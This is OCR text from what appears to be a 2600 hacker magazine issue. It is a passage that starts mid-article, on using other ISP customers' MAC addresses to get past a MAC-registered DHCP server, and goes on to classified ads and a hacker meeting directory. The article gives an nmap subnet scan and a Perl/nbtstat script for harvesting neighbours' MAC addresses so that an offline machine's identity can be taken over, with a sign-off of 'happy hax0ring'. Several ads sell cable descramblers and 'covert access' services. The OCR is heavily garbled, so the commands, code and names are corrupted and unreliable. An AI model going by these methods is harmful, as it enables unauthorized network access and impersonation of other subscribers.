hould be painfully clear how these concepts 
i on Id he incorporated into a script for things 
hke port scanning or whatever your devious 
mind desires. 

The Authenticating DHCP Server 

I his is where h gets a little tricky. Some 
l Ps Hike my TSP) require you to register your 
l \C address so they can control which com- 
puters have access to their network So, what's a 
hov to do? 

Grab a list of IPs and MAC addresses, wait 
lor an IP- MAC address to go dow'n, and use that 
MAC to fool the DHCP server into thinking that 


you are someone else. Easy, right ' Tin hard pun 
is how r we get the MAC addresses Lik kil\ i 
crosoft has provided us with an easy \\u\ ti 
query MAC addresses from remote . omput \ 
Netbios strikes again! First we need to gene uh 

a list of IPs of computers that are on our 

II our IP is 24.64.220.20 then w e e.in be pr 1 
sure that all of the people on Mo I ' ! i. . 
registered MAC addresses. In i ■, . w i Ildi ■ i 

NMAP scan on port 139 (netbios porn 

subnet and generate a list of IPs to qrn \\ lor 
MAC addresses. 

nmap -sS -p i 39 -oM 24,64, 23 L M ' f i ] 
open | cut -d 11 " -f 2 ] ipjisi' will genciMU om 
list. This should work on Linux and Window 
(if you have installed Cygwin and NM Alb 
Then we need to get MAC addresses for all oi 
the IPs, This can get a little ugly when you 
have to do it manually. On our Windows box 
the command 'n bis tat fi A [IP Address] 1 will 
give us the MAC' address of the remote host as 
well as some other useless info. Here is a little 
script to generate an IP- MAC table. Wc will 
need to do a 'cat ip list | pert this script' on our 
Windoze box. 

while ([]) [ 
chomp ; 

$ip=$_ ; 

chomp {$mac_raw= v n btstat - A S_ j grep 
MAC) ; 

( unde l/unde f,undef,$mac)=spl it ( ' 

.$mac_raw) ; 
print "$ip $macW* ; 

1 

Redirect the output to a file and wail a few 
minutes. Then ran the script again and see 
which IPs don't return a MAC address. These 
computers are no longer accessible meaning 
that their MAC can be used to authenticate 
against the DHCP server. Follow the steps out- 
lined above using your newfound MAC address 
and you are on your w ay. 

Final Thoughts 

While using multiple IPs is a good way to 
cover your tracks, it is in no way a magic ring 
that makes you invisible on the Internet, Think 
of it more as an added layer of confusion when 
trying to follow your tracks. Al the very least l 
hope that you learned about Cygwin and how it 
can add a whole new dimension lo your Win- 
dows world. 1 have written several scripts 
around these concepts. Feel free lo email me for 
copies. Happy haxOringl 
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Happenings 

IN L ER7.QNF. II. April IS 1 3. 200 3. AtlantaN hacker con is dtrting 
another eve ijpcntr! Come educate or gum knowledge in today's is 
sues, All needed info is on site: wwwinterrifiie.cinn or email; con- 
tactl* inurndXte.com (That's intenzDne, spell with u irem!) 

SAN i KAN CISCO OPEN BSD USERS GROUP now meeting 
once a month ill Go*t Mill PiswjJc first Mondays at 7 pm - for info see 

hltp^Av wW.sfobug jorg- 

For Sale 

IP-BLIND OUTGOING SMTP TUNNEL suitstole for installation 
hehmd any wch-proxy firewall per year. Will completely disas- 
sociate your outgoing emails, from your employers network. Send 
check loTipjar, Bov 43 1 fi3 , Kansas City, MO 64171. Include u gltod 
email utldte^ for yourself where we will send you ihe client half of 
the software. This is for privacy Mid sidestepping restrictive corpo- 
rate aunnintncnooris directives, NOT bulk mail I.O.S. vio- 

lations. Ydut check will not he deposited until you declare your 
satisfaction. 

HACKERSTICKERS.COM - Get your geekish nerd related hacker 
slickers for your laptops, cars, and gear. All different colors and new 
designs ww w.lutckcrstickers .com . 

THE SLICES 'S GUILD, a slowly growing group, is taking urdcm 
for our first Kvue of the Slirtr'x Guild fnaga?me Tor only $5 (U.5.). 
lind tHi! why we call ourtelVeft "sheers" and why our hacker maga- 
zine is complementary to 2600 and noi competitive. This will not be 
offered as a subscription yet Yon will have to check Marketplace for 
when the second issue becomes available. Send your request with a 
money order along with anything else you might want to he primed 
in a I acute lame to Ijrry liaaiii Wheeler K 1 7592, KWH S. Hwy 
2037* Fan Stockton. TX 79735 USA. 

WORLD'S I IRST 4 'DIGITAL DRUG." Hackers, get ready to cx 
pcriencc the next level in wciware technology! VoodooMagickBov is 
a 100*3 legal and safe way to enter into a drug-like Crip. A- 1 you need 
iu dji ts place the clips on your ears and turn the knob on the 
VtxxlooM flg rckBox It s like nothing you've ever irietll l or details 
and ordering informatifia, visit www.voLrfhKHHugiekbojt.coin (money 
orders, and credit cards accepted). 

CABLE TV tIESC RAMBLERS. New, (2) Each JUS +■ 45.00 ship 
ping, money nnJcricash only. Works on analog or analog/digital ca- 
ble systems, Premium channels and possibly PPV depending on 
system. Complete with UOvuc power supply. Purchaser ramus 
Mile responsibility Jlu notifying cubic OpCfflRhl ol use or descrambler 
Requires a cable TV convener ( i .e . . Radio Shack I to be used with the 
unit Cathie connects to the convener, then the descrambler, then rite 
output goes to TV y;i tuned to channel 3. CD 9621 Olive, Bos 
2HW2-TS, Olivetret Sur, Missouri 63132. Email: caWedescramblcr- 
guy C^yahoo.eorn. 

REAL WORLD HACKING: Interested in rooftops, steam tunnels, 
and the like') For a copy of InfiUratk>n, the /ine aboul going places 
you're not supposed |o go. send 42 to PD Bos 1 3. Station F„ 1 ortmto, 
ON M6H4EI, Canada. 

INTERESTED IN PIRATE AND LEGAL DO-1T-VOI RSELF 
RADIO? Hobby Broadcasting magazine is dedicated to DTY nt io 
and broadcasting of all types. 52 pages. ^sample, S I 3/4 issues to 
Nobby Broadcasting, POB 642. Mont Aho. E*A 117237 www.hobby- 
broadL'asling.cojti . 

W W W.PRQTECTAJNELCOM. Protect yourself!: Everyone has a. 
need to be and feel safe froci the. outside world, We carry a lull line 
of self defense, security. and surveillance products ai low pnccs 
Every thing from alarms to mini cameras to telescopic batons to ■’tun 
puns and more! Cheek us out, ail major credit cards accepted. We 
ship worldwide! 

FREEDOM DOWNTIME, die fcuntre-kngih im) documentary, is 
now available on video! See the adventure unfold as we Try to get to 
the bottom of the Kevin Munick story and prevent a major motion 
picture from spreading more lies Available on VHS in NTSC (U.S. I 
format, 121 minutes Send $20 to 2600, PO Box 752, Middle Island, 
NY 1 1 953 or order via ljui online stone at www.2600.com 


MACINTOSH HACKERS can get nil (he mac underground fifes on 
A profess i mildly published CD. 650 Megs of PURE u tactile*. Eil- 
eludcs die De feint 7 Macintosh security speech, the whole Freaks 
Macintosh Archives and Whacked Mac Archives, 125,00 USD will 
ship irrtern.uionallv. SecureMac. PMB ' 1(1, 61 70 ft Lake Mesid 
BIvtL, Las Vegas, NV S9J0H. USA. Hack from your Mac! 

HACKER T-S H J R I S F ROM Y Ol R FAVORITE G RGL 1 F’S, 
along with a plethora of our own designs. Jinx Hack wear is selling t 
stli iris, sweatshirts, and hats for groups such as Ddeori, Phniek Mug- 
azme. Cult of I he Dead Cow, Packet Storm, HNC. Coll usion. 
Password Crackets Inc , HNS, Hackers com, AataLr vista, and New 
Order. New site wiih Forums. Hacker News. Conference Updates. 

LA N Parly listings, a Photo Gallery, and a chance to Spestk Out 
Check it out! |i(lp//wwwJmxHackwe,ir.cniri 
LEARN LOCK PICKING li s EASY with our new hook We've 
just released a new edidrtn adding lots more interesting; material and 
illustrations. Leant what (hey don't want you to know. Any security 
sy file in can be beaten, many times right through the front door Re 
secure. Learri the secrets and weakness of today's locks. If you want 
to get where you are not supposed to he. this book could be your ;m- 
swer. Explore the empowering world olTock pickinE Send twenty 
bucks In Standard Publi nations, PO Box 2226HQ. Ch;nn]"JSiLj£.t'i, II. 
6IS25 or visit us ui www'.f,landardpublk:at ions.com/di rcct/2600.himl 
for your 2600 reader price discount, 

COVE KTA CCESS.COM - Amazing EQUIPMENT and SERVICES 
providing you with the physical and records access ytwi need! 

OVER 150 I I : I. KCOM MANUALS ere now available online lor 
free viewing/downlouding at Hit Synergy Globed Network's fully re- 
designed website. Must being available in Adobe PDF format, they 
are crisp, dean, suitable for printing, and complete. Update your 
phreuk library now he fore it’s too laic. We don t know how long this 
website WiU be allowed m distribute these manuals, however they 
are yours (or the time being. Our website is free and open to the pub- 
lic, and requires no purchase of any kind, and is also free from pop^ 
up (or pop under) advertisements as well. PAYPHONE SERVICE 
MANUALS TOO" Visit us online at: hUp;//www.*ynergygloba3 net- 
works, com, 

CAP'N CRUNCH WHISTLES. Brand new. only a few left THE 
ORIGINAL WHISTLE in mini condition, never used, Join the elite 
few who own this trews ere! Once they are gome, than is it there are 
no more! Keychain hole for keyring- Identify yourself at meetings, 
etc. as a 2600 member by dangling your keychain ami saying noth- 
ing, Cover rare hole and get exactly 2600 h/, cover ihe caber hole 
and get another frequency. Use both holes u> call your dog dr dol- 
phin. Also, ideal for tele phone remote control .k vices. Price includes 
mailing. $69.65, Not only a collector item hut a VERY USEFUL 
device lo carry at all limes. Cash or money order only Mail to: 
WHISTLE, Pt>. Bon 1 1 562 -ST, Ch. Mi.rfsoun 63105. 

HATE MICROSOFT? Or do they just leave a loul aftertaste? Show 
your divans faction with a ’’Calvin peemg on Microsoft" slicker 
Sticker is approx. 1~*T and fits nicely in a car window or even on 
ilv: side of your favorite p nix box, l uich sticker is made of commer- 
cial grade vinyl Water and UV ray rdislimi To see a sample go to 
htipL//calvmh;uef,micruwft .hypermun.net. 57, IX) (CIS), Slfi-00 (US) 
for irlcrmtional Oder the Calvin sticker and the MS logo is yours 
free. That's right, THE MIC ROSOFT LOGO IS FREE tear that one. 
Bill L Send a!) ■ irders to CD Muync, PO Box 57 1 79L Murray. Utah 
H4157 USA. Cash or money orders only. No checks credii cards, or 
COD Allow 2-3 weeks for delivery via US PS. 

Help Wanted 

HIRING PROFESSIONAL INTERNET CONSULTANTS with 
job references only for the following: wetwite security, performance 
tuning, and inurkcting for online magaziite. Please send your bio and 
resume to: jbhartswciribWyahoo.com -you can work from home, but 
should live in tor around) NYC. ft- you will need to attend a meeting 
or two. 

NEED ASSISTANCE In rescue/recover ASCII kxt data which arc 
presently compressfld/eiterypted by some rype of commercial pro- 
gram. Most files are rather largo, from 30 MB to about 6tX)MB. L’s- 
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me DOS based starch engine for retrieval. Please advise i ( there ex- 
<s .my tools currently available nr aisvone wlm may be of help. 
i 1 thndp4 w horn oil, com . 

I MED TO BUII.D A HIDDEN CAMERA SYSTEM including 
sound on a limited budget to take with me on rny visin with n;y 
■- hikl in order to prove that everything is going well Please e-mui ! 
any recommendations to Invcpulsetj* yahoo.com, fax(2UK) 330-0256 
LOCKSMITHS: I am in need of a key maker from only a picture 
and a pencil sketch over of □ key. Periling on timing and locaiioc, I 
may be able to get the key lor a Saturday or Sunday afternoon mect- 
mg 1 am in Kenosha, Wf, vo I con only go lo Milwaukee or North 
i liieago for meetings. Please c-itudl at MifstcrSS hmmail com ii 
interested, make the subject ,r kcv maker." 

Wanted 

YOU MAY BE NEXT ? GIVE ME LIBERTY... One million Mgnu- 
mtes needed on PETITION to US. Sen.ire 'Committee cm the Judi- 
■iary" to investigate the - shocking bul true facts of Americans being 
■mlicted and convicted illegally by U S. Judge Robert G. Renner. We 
,ok you to «innd with us and let the Vnice of Freedom he heard tis to 
the rnjuMice done to John Gregory Lmnbros PLEASE VISIT: 
w w' w. pci it jonoitline.eoij Yjflambros7pctjtian.html. Documents support- 
tag the petition to Senator Cltar Ses E Grasshsy are available within 
i he Boycott Brazil web site www ; .bra/ ilhovcott.org. THANK YOU. 
NEED TECHNICAL ILLUSTR ATOR. I'm writing a book on se- 
• urity circumvention, lock picking, hypu-ss. safes, alarms., and other 
subjects. 1 need someone experienced at technical drawings to create 
original black and white illustrations for iny book. I live, in the Dnl- 
ias-Eon Worth area of Texas and would prefer someone of college 
hge nearby, although we trnild probably manage long distance col- 
labrintion. This will be unpaid work lor both of us until the book 
.;ets published, at which point we'd split ihc profits equally. I intend 
■ offer it (o Loompanics or Delta lYess. and have every confidence 
' hut they'll want ro pnblisfi it, Please coni act me at 
ilrill_rekH.Aerfrfyahoo.com if interested ! 

REWARD for code ujied on NOKJA cell phones to continuously 
monitor 3 cell phone channel. Code allows eontintiojis receptitm on a 
htmrtei for Lest purposes. Reply to - re-sponve^blKHei'' yahoo.com. 

Services 

INTELLIGENT HACKERS UNIX SHEL L. Rcviitte.Nct is 
owned and operated by intclligeiit hackers, ft'e believe every user 
hu.rf the right to online security and privacy. In today's hostile jmti- 
h acker airimsphcrc . intelligent hacker?: require the need Imt ;i secure 
filacc to work without big-brother looking over their shoulder We 
provide highly filtered DoS protection. Our main verver sva P3 L.2 
ghr machine, 1.5 gig* of ram, 512 meg^ of swap, At) gig F.IDH, w ith 
complete online "privacy." Compile your favorite security tools, use 
ssh, slunnel, nrnup. etc. Affard,iblc pneing from MOfmonth, with it 
14 day money back guarantee, http:// www.reverse.net/ 

NOW' YOU CAN CHARGE A FEE for receiving unexpected 
•.-mail. www,p;iy2scrid.cora is accepting bula-tcsrers. PhyTo.Scnd is a 
TipJar company, 

SUSPECTED OR ACCUSED OK A CYBERCRIMI IN ANY 
CALIFORNIA f>R FEDERAL COURT! Cnnsuli with a semantic 
warnor committed to the liberation ol information speciaJhehtg in 
ImckcT, cracker, and pbreak defense Contact Omar Eigucma. Esq., at 
i SfMiii 986-5591 or r-l 1 5 > I . at omar^aya, yalc.edu, Of at 506 

Broad way, San Francisco, CA 04 3 33. Free posonalconsulLaiion for 
2601) readers. All consultations arc strictly confidential and protected 
by the altumcy ■client privilege, 

FORMER CYBKRCRIME PROSECUTOR now defends those 
invcsitigaied or charged w ith thin lype of crime. Having been on the 
other side, I know how the system works and how the government 
cun ULigct YOU! With prosecutors probably warning you to serve 
prison time, you nerd a proven veteran trial aiitMney who knows 
how to handle these cases and wfko know 1 , how to defend ymir rights. 
Jason D. Lamm. Eisq, t602S 22-CYBER (222-92J7i. Lamoi & Awm- 
ti atts. 5CI50 N. 8lh Place, Suite 1 2, Phocm A/. K5C14 Free couti 
dcntial attd profeistorull coosuhatiop. 

GENERAL PURPOSE EMAIL IDENTITY AUTHENTICA- 
TION SERVICE for use from CGI programs Legitimate nies only 
pkase, hit p7/i ipjjr.com/nertiws.iTJ A LS.htrti! 

Announcements 

OFF TUB HOOK is the weekly one hour hacker radio show pre- 
sented Wednesday mghts at 7rLK) pm £T un WBA1 99.5 FM irt New 
York City. You can also lurte in over I lie net at 


WWW, 260fl.com/offthdiook or tin shortwave m North ami Yowih 
America at 7415 kh/. A rehives m nJl showi during > on L in *■ 

be (bund at the 26tXl site, novi in. mp3 formal! Voui tecdbui t . i 

come at mh@260fJ.oom. 

HACKERM I NDt Dedicated tn bringing you the upinnin i th 
in the hacker world. Visit lrww.hackcmiind net [or dcuul 
VMY TIISX'GM AUDIO RAN I S ,ire ov u i J . 1 1 ■ I ■ tn ■ >ri . i- ■ 
Computer talk sltows. These short and nflen htlainm MP 6 I i . ' 
title hysteria that sumiands computer viruses llu- Whit* H. ,.. 
puier security advisor hates these rants ( hi I n't . , it . : 

lightly i Check out Vinyths.coni/news.ciui for dt i id . 

WIK’D- A WANTON DISPLAY OF CON I Rmi \ND DLSRl V 
I ION, WDCD is a hiiif hrair rudin satin- produti d f i . ■ > • 
of otherwise unemployed individuals withr ill ti 1 1 id oUl i oid 
ings, analog symlhesi/ers, and racks foil ol % [range ckviuum = n 
Horn out of the pirate radio scene, ft^DCD lets e% isicd In ■ 
forms on van mis u nan thon/cd radio f requeue ies t>>r longer thnn ,ui> 
of us care to recall jov want to admit to j- You can hear ft I X 1 1 1 ". e i •. 
Friday at 6:3(J pm Ef on 74 15 KID, shortwave and no other ■ ind mu 
frequencies. If you don't have a shortwave radio, yourc missing mil 
on some interesting stuff! Check out our website for more in lorn 
lion httpd/www.wdcdraditi-cori , Verified WDCD listeners will . .. . . 
free surprise, ft^DCD Radio, 614 S Sth St. #3i9, Pbifxlelplii.i. PA 
39147 1 2 1 5> <G2-8328. Email mailbngGfwdcdrBdki.com. 

F^RANK PHONE CALLS. I .isicn to Lbc funniest prank phone i ill 
ever at w-ww,phatspii[.ccim/swankpranks, 

Personals 

HAVE YOU SEEN I i ON US WAGNER? 1 am looking Uh l [onus 
Wagner to catch upon old times; it's been over 10 years since wc Em 
sjioke, Seninr stuff member of Acil>, founder of RPM. and SysOp ol 
the Fm.il fantasy BBS. Hon us Wagner unconsemuxly played .m im 
portunt role in the 1BM-PC' ANSI art world, F>n October 27th, 1992. 
Dateline NBC aired a vmsatk'i utilized expose on '"ctnriputer hackers' 
entitled "Are Your Secrets Safe?" which displayed a couple of odver- 
lisemcnts for underground bulletin boards, one of them being Final 
Fantasy, Honus quickly vanished Lhcnwificr wjilunn a trace. If you 
know where to reach hitTi (or are him), please email me at: imf- 
mait 00' acid.org. oc visit 

fi ti p^/w w’ w, bbsdsx: umc ntiiryxoJtYlook ing.hc tn! Rad Man, ACID Pro 
ductwfis, Pf.J Soc 24523, San Jose. CA 95154-4523. 

STARTING A HAXOR SUPPORT GROUP and need parridp.i 
lk)n from experienced and inexperienced haxorts, crackers, and 
phreaktra. If you would tike ti) join this FREE sets itc, write me at 
the address below You may be asked to search for infonnatnat on 
(hr net to assn-.t . -dier-i wiifi le^ experience or submit knowledge un 
techniques you know. Also, looking for political views und electron it 
projects as well as ideas for hocking for a magazine I am starting 
Write to me at: Lurry Heath Wheeler, 817592. HW8 S Highway 
21)37. Furl Stockton, Texas 79735, All inquiries will be answered. 
ANOTHER HAULER IN PRISON! Don't cry for me. I did it to 
rnysclf. I would like itiformntion ifor educational purposes only, of 
course! where I can buy. how to build, etc , an RF device that i could 
point at a given garage door und it would scan and dcscntmble. open 
sesame I'm extretuely interested in this technology. Anyone wiih 
mure infti or ideas, please conmti me vta snaM mail at: Mark Cara ley 
P 24536, F2-116 L Cbuckawalla Valley State Prison, E 1 ! > Bos 2349, 
Blythe, Cafifinmij 92226. Will answer all. 

VOl NG MAN WANTED for correspondence and/or possible htng 
term reEattonship. Prefer guy* under 2 1 who are either computer lit. 
crate or have a desire to k-ara and are honest and non violent in Urcir 
relations Especially interested in ifim, smooth, young men. Drop me 
a line tand a bare as you dare photo il you wish t (o me at: Dw:tyne, 
PO Box 292IJ67. Lewisville, TX 75024-2067 

ONLY SUBSCRIBERS CAN ADVERTISE IN MOO! Don't even 
think about trying to take out an ad llii less you subscribe! All ads, ore 
free and (here is no antounr of money we will accept lor a non-sub- 
scriber ad, We hope that's clear. Of course, we reserve the right to 
pass judgment on ymirad and not print it if it's amazingly stupid or 
has nothing ai all to do wiifi the hacker world, W r c make no guarantee 
as to lfie honesty, righteousness, sanity, ett ol the people advertising 
here Contact them nt your peril. All submissions nte for ONE IS 
SUE ONLY! if you warn to run your ad more rirnn once you ctiust re- 
subnfit it each lime. Don't especi us to run more than one ad For you 
in ti single issue either. Include y*nir address label or a photocopy so 
wr know yotfire a subscriber. Send ynurud to 264X! Marketphigc, PO 
Hos 9 L ), Middle Island, NY [ 1953. Deadline for Spring ts.sua: 3/l/fll. 
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AKL.ENitNA 

Auciiu* Aire--- i itic luir Jl San 

JoseftS, 

kWhialia 

Adelaide: M 1 1 1 -. payphrino tvur 
lhe Academy Clfleiliii tin F'.ilteuey 
Apin, 

llrrihuiuj: Hungry Jiurbf un the 
Qu«n Si. Mill I i RMS, Apposite infs' 
Booth) 7 pm. 

Cubun; KCN VjiTLi;il Reality 
HT'uid'c, 1 1 tiint RW, Civ ll". 7 pm. 
Mdluuuin.-: Meihuumc l Vaind 
Shopping Conti* .h ibe SwoitMun 
Struct enimncc seal the public 
phone*. 

Perth: Hit; Merc hum Tea qih! Or 
|i;c HouSfc, HD Miirnsy Si. n pm. 
Sydney: The Crystal Palace. Front 
Iw.'hisTm, opporitr the W Mouun 
area oil Ceitfge Street lie Ccjilfi.il 
Star ion -ft pm. 

AUSTRIA 

Gnu 1 : Cafe H.iln-'i He on 

idcDtriitiipJal i, 

BRAZIL 

Hdu ILurimii!?: Pctr^u •• Bur at 
A&sufcng. near tlw payphone, ft pm 

CANADA 

Alberta 

Calgary: f-jiLit (jure .Market luod 
court by Lhehiattd ydlow wall 
(formerly the milk wall’). 
Edrtiunloo: Edmunniri City Centre 
IjGWCI" Level Wiplt tn Ihc fund tOurl 
by ihc payphurua 

British ( iitunibia 
Vimcmjvtr: Pik.cn C Centre Food 
Fair, one level down from atccL 
level by payphunfi, 4 pul 1 1 ) ’ll pm. 
Vkluria: Hah n Center loud court 
byA&W. 

New RrmwwfcL 

Mancfoai GmunJ Zdcb Network* 
72ft Main St 

OtHurlu 

Barrie: Willimai’-. G.dTcicIftib, 5ft5 
Bryn-- Drive, 7 pm. 

HdLbifiiAEi; Jut rj>m Sipuira Foo l 
cowl hy payphones ami riurpet 
Kin^. 7:30 pm 

Torontn: Computer ScL-unty Hdu- 
calhufl Foultly. 194a CtiDcfi; Si. i 

QvIkc 

Mfinlrrui: Ik- 11 A 1 1 1 phkheaLtt- If M K.I 

Gauc beticre Strenl, 

Denmark 

Anrims: 111 tin: M.i f-'inc ■ f the 
rXSB calc in tbe railway -.taUim 
Copcnhugcn; lenni. . 1 iu in Hl>v 
cdh:tnc^ar[lcn-i Shopping CenlrL 

ENUIAM> 

BrisMb Next U' the orange uuO 

grey pjypbi.'iv'- ".. 

Game stone, MeiUiam Street, 
BruudmeaJ. Paypliotim: +44 117- 
929901 l 9feu4T7 7:30 pm, 
F.xlIltj ui the payphone , Ftodfntfl 
Square 7 pm. 

1 jmdiui: Trtvaileii • Shipping Cdl* 
tea fnear FitaidUiy Ciicual. lowest 
level 7 pm. 

SEuirhesler; The Oreen R.i-mr -m 

Whitworth Street 7 pm. 

FINLAND 

Helsinki: Media i'la/jut near the 
Minteiriy coffee shop 
I Tookm Ijihdiinltaiii ll, 

FRANCE 

Fjtrwi FJiiee tie U ftepuhliLjue. near 

the leiiiptv I fountain r-pm, 

GREECE 

Uliciis: OttUfck Lhc- bookstore Po 
ixiswnriun on the corner nt Pativnm 
and StuuriwL 7 pm. 

ITALY 

Milan : fYi/yj Lriset * ^ in In ml of 

McDonalds, 


MKXIOp 

Me lieu l %: /i *■ ah :■ Suhw Si j- 

llun (Line 1 of the Metre, blue I Lett 1 . 
At the "Dcpiltiumenh itJcl Dttfrii” 

l eJerul , til I . ,1, ill. ' 

the cuiitly shi'p, in the he.eiEimnL’ ol 
the "’/i H.viJo-Pinn Skum/ tunnel. 

NEW /.EAL VND 
.Vucbhmd: Lartdnc Biir, Lip-.Lun- , 
WcLItrJoy Sl„ AueVhni.J Cenirai 
5:30 pm. 

t 'K retell Lirrh: Javn Cafe, comer ot 
High Si- and Manchester Si. 6 pm 
WdUagtnd: Fat Ladies Anus 
5:30 pin. 

NORWAY 

Oslo; OsLi SfotialTnim Swhoit. 

7 pm 

TrarndheJm: Rk'k 1 1 ulc rn 

Nordttgine. 6 pm. 

POE, AN! > 

Sturpird S/m'i'iinkit An t’nfte. 

Bring bhu? lsuok 7 pm 

Hi SSIA 

Mcnseaiwi Hurjjei Queen e*Te neat 

TAROA5U (TtStphoite Agency of 
RuHiu/Telegniph Ageflcy of Soviet 
1 tunim tUo kntiwn ..v Ni u- l ie 
Vcirota. 

scon, AND 

t iLusynM : CentraE Suuioti, pay 
phutits next in Platform L 7 pru 
SOUTH AFRICA 
Jahauiic^tMing (Snntfion I H> n 
Sji’ Il. hi :.?od CLJurt. pm. 

SWEDEN 
f. l u v 1e: Rui I mad >L j I i O tu 
Stock li i.hlrn : Outi.ide L.ivu 
I NITED STAIRS 

UabamjL 

Auburn: 1 he^luiJeuI Jiteigt up- 
‘-Liiirs in the Foy Lriuvn Building. 

7 pin. 

Kinniiighjm: Hoovei Onlleria 

IlhhI l-liuit 7 pm, 

IlMtiWvihe: Mauhttm Square Mnfl 
Ifl the fund mart neur MuJ lucuiitT s. 

7 pm. 

liivetdruiJia: Mdl'aMurid Mull food 
ceiun near ihc ftoni cnffjuiet 
Adltxu 

Iito|h : Ciinte Vf'Lokviii Arizona 
M-'K Mil i 

Arluutiuii 

Jj i nt-s In i rtp: LidLui Mail IlmjJ foun 

by «iie Ffs vypftdows. 

Calllitrnla 

Las Angriest Union Suih.-n cumer 
of Miacy& AJaimedn lusade mam 
entnaicc Fv bruik d ph mt ■ Pay 
phones: (2 ! 3) 472- 05 L9, 9520; *25 
- J . • 9014; fi I i 97(M WM 
Orange C*unty 1 1 .ueunn MpueJ u 
No.de CotTce, j7iJl£l Alma Parkway, 

m. 

Sim Diego: LeufULlia'S Ptrj.erui .'ll 
Repents Road i. Volss Shi^rping 
MidJ>. 

Sun F ruiKiwu; 3 hminareodiTo 
Plafp (inM!le 1 . Pajphr.nv. »4l5) 
Vjg-^Etl 9S04. OS05, 9EOfi 
San Jft>t (Cunipk-IL: Ort'lliutl V;d 
Icy Coffee Sftojv'Nct Caie or rht 
funier uf S CVntrui Ave, and F. 
f un ipticll - Ve 

‘situ L.i tfurtoinu Cafe Siena on 
Suite Slreef. 

Colwrudu 

Boulder: Fatty J'n. food iroan I dh 
Jnd pjtkge F» pm, 

CnaneetirtiL 

Meriden: Menden Square Mall 
fi'ji ?d uqurl. fi pm. 

DBtriLl ipf i 'ohuntili 
Vrliiitfuiu pentagon City MoO in 
the fotn 1 eoiiri. ft pm 


Florida 

Ft, I lliapril I lllll" Browapi Mull jn 

due court, 

tiairm-svilliie In rite Nek «f Uk Dni- 
vtrrilyof 1 -lmids'v Rek/ UruSu 
Tctod Court. 

OrLindo: f jidu-.m St|uAi. Mflll 
Food Cruft between Hcurvn 
Ciourmei and Manchu W'uk 
Georgia 

Ailanlu.: Lenox Mall J-r-ud eourt. 

7 piu 

Huwnil 

llondulu: i ’offee TVdk Cafe, 3(i'\ I 
WaiHiae Aic. Payphone: (MON j 7,11- 
9184. ft pm 

Idahn 

FoiatclloT Oil lege M.ukcl, rdia 
Stuilh Sth Streel 

Itttnuri 

Chicago: Union Stint kv.i m ihc 
C ireat HaJ I near the payphones 

lndlann 

Lvansvillrj tt.Lnw and Noble cjJe 
.,i M4 S Crtteti Riv-rr RlL 
Fl. Wayne: fklenbr. h ik Mail loud 
court in from ol SiiiinipS ft pm 
iuduinupulisT Bortleni BoqL^uO 
live comet of Meridian aud 
W'. i ' h i nglcln . 

Kansas 

KunML> C'iiy lOii'dund: Farkjr 

Oak, Birk Mall Food vtn.ii 

I ■tuifiUlllH 

ILjioji Rouge: f ji Lite LSI’ L'tiiom 

Huddin^. bclwwn ibe Tiger Fauve 

6 MeDcmahf v. nev: lo Lhe pnv 
phone:. Piiypht'in.- numberv (715 1 
387-9520, 953K, %E 8 r 9712,9733, 
9733. 

New OrleaiLM Mythique, 1 135 De- 
calur St f> pni 

Maine 

Forilun.[l: Mail',! Mall hy the ben, h 

at (he lood court dr»ir 

Marylimd 

Bjillimnre: Harrep; & NcWt cat e at 

the luner I lurtHif. 

\Uffliiclniirth 

floviun: Pniilelitial Ceitler PLuau 
[L' fracC food Mil al ihc tables Dear 
lhe wihtlnwr 7 pm 
M arfbomupdi : SoIourui } L .nk Mail 

food L’LiUIl. 

Northamptrm; favwwL Cafe ncno,i 
from Pulaski fhuk. 

Michigan 

Ann Arbor: The Galleria • >: i Smith 

Llnivc^'d.ly , 

jMJjEiievotn 

llkiomiiiglun: Mull of Ant nw;i, 
ru.rxn vide food. Lourt. acxtw^ Iriml 
Buract Kine \ dw i auk r>i pay 
pbioie- lh:d don'l take itteomhig 

L-nfl li 

ilulutli: BMTFieti * Ni'hkby Cubi. 

7 pm. 

Vlissiduri 

lv.in-.H- Clfy iTudr|jeodciiee|: 
Rnnies A Noble, I9t7tl F-isl ^Ih St 
SI, Luiila: Gidierin* Highway 413& 
BrciitwcKHi, cleviUcdAwtiofi, hMd 
court jjeu, by lhe ihLUilen- 
Spilngiirlil: Baines A Nol Icon 
Bairietkeid fletms from lhe mall. 
Srlt-l pen. 

Nebrasku 

fim.ilm: Oak View Mai! flano A 
Noble 7 pm 

Nevada 

l.a> Vepjiv: i'alm-L Cuiinu : I 

Court. 8 pin. 

Now Mexico 

kiliuquenjur: Winrotk Mall food 
L'sutrl. near payphonemn the lower 
level I vl wean lhe I'. iiaUliuii dt ,u 
end*!. Pflvphuncv £3fl6i) 8H3-79lri5. 
997ft* 984 1 . 


New York 

HutT.iJi.; Galleria Mall 1 - o 
New York: Gitigioup 1 • , , 

h 'Mu , itctM rN- pay phi ^ n !►*- 

53rd SSL, bwweiea LeJthifi^ ±mmL 
\di ih Camlln4% 

Chjirhydte: Snntb J L ;ut ‘ 1 , ^ f _ 

dlTU uf U sid '••i.mji i ■ ' 

Ruleigh: Crabtree Valley faJ 

conn in irnntuf the Mel* i,,^) * 
Nnrili Dakislu 

Fargo: Bamen mid NuMrix i m 

47ud St. 

Ohio 


Akron: Aa.ibicu on W Men i.< 
SirecL. ini er 5 CCticin of Hu A I .. w 
MurkeL. and LvchangC- 
Cincinnati: Cody's Cafe. | n I «i 
hnUil St., lar hack n.LH 1 i I* j, Mk 
Cleveland ilkdliirdl: BeOi.^l 
Arabics, 7^0 Broadway -Qn, lu.i 
!'ord Square I GiaillllOttt). 

Day luni At die Morions- lv {,,, a | «m 
Hay inn Mall, 

OlilahHiia 

OklabuiiUi city : The Ma ul. \ 
in the Lakeside Shnippsrip ( rn | n 
near the yomcrnf'N May v>. «a*l 
NW 1 3rd St. 

Tnlxjy.: Woodland Hills Ml li!| i » . i 
eijurl. 

I irtigw 

IWiland: Coffe£ People Nmil. 
west, 533 NW 73rd. 

PmrpijhiniJi 

Ent: no Edge, 713 Frcu , | . M i 
Philuilclphia: .Kill: Si reel bs , 
loud court, srrKikirjji 'iet: 1 n, u 
Pltrsburgh: Whlluni Pin 

bujlding on lhe UnLVcr.',jl>, u ] pnu 
burgh eitrupu- hy me 1 -f i pejj., . y, 
Boulevard cniraiKT 

Smith Cui'uliiu i 
Churk^limt North V oohIj. ftf.ill . 
flic hall between ikcuri anvj 
Orit-FllA 

South Dukulo 

SiouK I'lllbi: Empire IVTi'.il h v 
Bujget King 

Tmllessee 

Knoxville: Border* ltonk*Cair 
Bcios* from WcM«wn MulL 
VJeinpbiar Dames & NohJ ? 

Hickory Rklge Mall. 

